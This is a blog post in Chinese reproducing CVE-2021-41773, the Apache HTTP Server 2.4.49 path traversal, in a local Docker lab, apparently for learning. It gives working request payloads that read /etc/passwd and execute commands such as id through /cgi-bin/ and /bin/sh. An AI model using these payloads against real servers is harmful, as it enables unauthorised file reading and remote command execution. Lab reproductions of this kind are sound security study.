Cve-2021-41773漏洞复现

最新推荐文章于 2024-06-01 21:43:54 发布
最新推荐文章于 2024-06-01 21:43:54 发布
阅读量70 收藏
点赞数
文章标签: 学习 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60584088/article/details/133715630
版权

Cve-2021-41773漏洞复现

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:
版本等于2.4.49
穿越的目录允许被访问,比如配置了Require all granted。(默认情况下是不允许的)
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。
开启靶机:

docker-compose build
docker-compose up -d

  • 访问本地8080端口

在这里插入图片描述

  • 启动burp,开启抓包

在这里插入图片描述

  • 构造Payload: /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1``

在这里插入图片描述

  • 这里直接发现能够RCE
  • 直接修改url参数:POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
  • echo Content-Type: text/plain; echo; id
  • 发包!!!
    在这里插入图片描述

直接命令执行!成功获取到id值

  • 尝试whoami命令
    在这里插入图片描述

参考地址

久恙502
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
【网络安全】CVE 漏洞分析以及
heikeyouyou的博客
05-22 1127
记一次CVE 漏洞分析以及
CVE-2021-41773漏洞
dreamthe的博客
10-18 7805
1.安装debian系统 首先我选择的系统是debian10版本,也可以在别的系统完成,我想一个纯净版,所有重新安装了一个系统,安装步骤简单展示一下。 1.创建虚拟机,点击下一步。 导入镜像 自己选安装的位置以及虚拟机的名称。 安装过程需要设置管理员密码和新建一个用户,自己设置一下就可以了 这里选择了第二个。 因为之前我们选择了lvm,那么这里选择是就可以了 因为我们需要一个简单系统,所有只选择了下面三个安装软件 中间少的部分就是一直点击继续就可..
CVE-2021-3156】——漏洞、原理分析以及漏洞
最新发布
IronmanJay的博客
06-01 2169
2021年01月27日,RedHat官方发布了Sudo缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取Root权限。
【网络安全---漏洞】Tomcat CVE-2024-1938 漏洞和利用过程(特详细)
2401_84264010的博客
05-08 1163
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
【网络安全---漏洞】Tomcat CVE-2020-1938 漏洞和利用过程(特详细)
热门推荐
m0_67844671的博客
09-12 1万+
Tomcat CVE-2020-1938 漏洞和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
CVE-2021-41773&&CVE-2021-42013
weixin_42345596的博客
10-09 4837
CVE-2021-41773 漏洞原理 Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响: 版本等于2.4.49 <Directory />Require all granted</Directory>(默认情况下是允许被访问的)。 攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在
获取最新漏洞CVE—Python
渗透测试
12-19 596
可以添加发送邮件模块进行漏洞自动预警,也可以接入微信模块,在群中自动预警。源:腾讯、华为、绿盟、启明星辰、CNNVD。结果输出为xlsx文件。
CVE2012-2122漏洞 ,用两种攻击方式
weixin_64655821的博客
08-26 956
CVE2012-2122漏洞 ,用两种攻击方式 mysql 备份上传木马,并用shell工具连接操作
cve漏洞是什么意思?cve漏洞及利用
白帽黑客鹏哥的博客
12-08 3877
CVE(Common Vulnerabilities and Exposures)漏洞是一个网安技术术语,用于描述和标识信息安全领域的已知漏洞和安全风险。CVE是一个公开的列表或数据库,它为各种公开知晓的信息安全漏洞和风险提供了标准化的名称。每个CVE标识符都是唯一的,并按照一定的格式命名。这些标识符允许安全专家和研究人员在讨论、分析或修特定的漏洞时保持一致性。
【web安全】CVE漏洞
weixin_46301214的博客
11-22 551
漏洞不能直接反弹shell,需要先下载反弹shell文件,然后执行shell文件。当然了使用curl下载前,你需要先搭建一个web服务器,然后上传好shell文件。【CVE-2018-1273】springboot漏洞 - RCE。【CVE-2018-1273】springboot漏洞 - RCE。POC:篡改post传参的输入命令即可触发RCE。云服务器开启端口监听,然后执行一下文件即可。存在路径后,随便输入点东西,然后抓包。特点:无回显触发RCE。先扫路径:/users。
CVE-2020-5902 F5 BIG-IP漏洞简单
zwish的信安之路
07-10 516
写过一遍了,就不浪费时间再搬过来了:https://www.cnblogs.com/zw1sh/p/13276377.html
Tomcat任意文件上传
m0_64361111的博客
02-24 749
启用docker systemctl start docker 安装docker-compose yum -y install docker-compose 下载vulhub漏洞靶场 git clone https://github.com/vulhub/vulhub.git 查看是否下载成功 进入tomcat cd /root/vulhub/tomcat/ 进入CVE-2017-12615 //想要那个漏洞这就进入那个CVE cd CVE-2017-12615 .
cve-2021-41773漏洞
06-28
cve-2021-41773漏洞是Apache HTTP Server中的一个安全漏洞,攻击者可以利用该漏洞在未经授权的情况下访问服务器上的文件。 要漏洞,可以按照以下步骤进行: 1. 安装Apache HTTP Server,并确保其版本为2.4....
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值